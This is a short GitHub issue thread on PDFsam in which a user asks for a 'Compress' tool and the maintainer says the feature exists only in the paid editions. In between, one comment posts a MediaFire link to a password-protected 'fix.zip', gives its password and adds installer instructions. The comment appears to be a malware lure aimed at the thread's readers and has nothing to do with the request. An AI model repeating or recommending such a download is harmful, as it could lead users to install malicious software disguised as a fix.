### ISSUE TITLE
Add a "Compress" tool

### ISSUE THREAD

**Issue by cphilippe-ch** [torakiki/pdfsam#625]
Hi there,

That would be nice to simply add a "Compress" tool.

Cheers
Phil

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by torakiki** [comment]
It's already available in PDFsam Visual [compress tool](https://pdfsam.org/pdf-compress/) and in PDFsam Enhanced, we probably won't add it as a free tool to Basic, sorry
